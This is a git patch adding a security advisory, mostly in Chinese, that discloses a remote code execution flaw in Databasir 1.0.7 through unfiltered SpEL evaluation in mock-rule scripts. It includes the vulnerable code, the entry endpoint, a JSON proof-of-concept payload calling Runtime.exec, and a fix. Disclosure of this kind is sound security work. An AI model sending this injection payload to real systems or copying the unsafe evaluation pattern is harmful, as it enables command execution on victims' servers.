From aa44d9c43c735e75d2e2f088f7ba36c1acad0327 Mon Sep 17 00:00:00 2001
From: luelueking <93204032+luelueking@users.noreply.github.com>
Date: Mon, 13 Feb 2023 13:07:06 +0800
Subject: [PATCH] Create SECURITY_1.0.7_RCE.md

Databasir 1.0.7 has Remote Code Execution vulnerability.
---
 SECURITY_1.0.7_RCE.md | 75 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 75 insertions(+)
 create mode 100644 SECURITY_1.0.7_RCE.md

diff --git a/SECURITY_1.0.7_RCE.md b/SECURITY_1.0.7_RCE.md
new file mode 100644
index 0000000..4988026
--- /dev/null
+++ b/SECURITY_1.0.7_RCE.md
@@ -0,0 +1,75 @@
+### 影响
+
+Databasir is a team-oriented relational database model document management platform.
+Databasir 1.0.7 has remote code execution vulnerability.
+Remote code execution vulnerability is a Web security vulnerability, we can execute any command, such as `open -a Calculator`
+
+### 不安全的代码
+
+`SpelScriptEvaluator`使用了StandardEvaluationContext作为context，`script`参数可控并且没有任何过滤
+
+> SimpleEvaluationContext - 针对不需要 SpEL 语言语法的全部范围并且应该受到有意限制的表达式类别，公开 Spal 语言特性和配置选项的子集。
+>
+> StandardEvaluationContext - 公开全套 SpEL 语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
+
+```java
+@Component
+@RequiredArgsConstructor
+public class SpelScriptEvaluator implements MockScriptEvaluator {
+
+    private final SpelExpressionParser spelExpressionParser = new SpelExpressionParser();
+
+    @Override
+    public String evaluate(String script, ScriptContext context) {
+        Expression expression = spelExpressionParser.parseExpression(script);
+        StandardEvaluationContext spelContext = new StandardEvaluationContext(context);
+        return expression.getValue(spelContext, String.class);
+    }
+}
+```
+
+### 漏洞入口
+
+在进行rules校验时
+
+```java
+    @PreAuthorize("hasAnyAuthority('SYS_OWNER', 'GROUP_OWNER?groupId='+#groupId, 'GROUP_MEMBER?groupId='+#groupId)")
+    @Operation(summary = "保存 Mock Rule")
+    @AuditLog(module = AuditLog.Modules.PROJECT, name = "保存 Mock Rule",
+            involvedProjectId = "#projectId",
+            involvedGroupId = "#groupId")
+    @PostMapping(Routes.MockData.SAVE_MOCK_RULE)
+    public JsonData<Void> saveMockRules(@PathVariable Integer groupId,
+                                        @PathVariable Integer projectId,
+                                        @PathVariable Integer tableId,
+                                        @RequestBody @Valid List<ColumnMockRuleSaveRequest> rules) {
+        mockDataService.saveMockRules(projectId, tableId, rules);
+        return JsonData.ok();
+    }
+```
+
+### POC
+
+攻击者可以控制rules的参数来造成rce，例如：
+
+```json
+[
+  {
+    "columnName": "test",
+    "dependentColumnName": "test",
+    "dependentTableName": "test",
+    "mockDataScript": "T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('open -a Calculator')",
+    "mockDataType": "SCRIPT",
+    "tableName": "test"
+  }
+]
+```
+
+![在这里插入图片描述](https://img-blog.csdnimg.cn/2bc2a508c7934b44803437cb64670678.png)
+
+
+
+### 修复建议
+
+最直接的方式：使用`SimpleEvaluationContext`来替换`StandardEvaluationContext`
+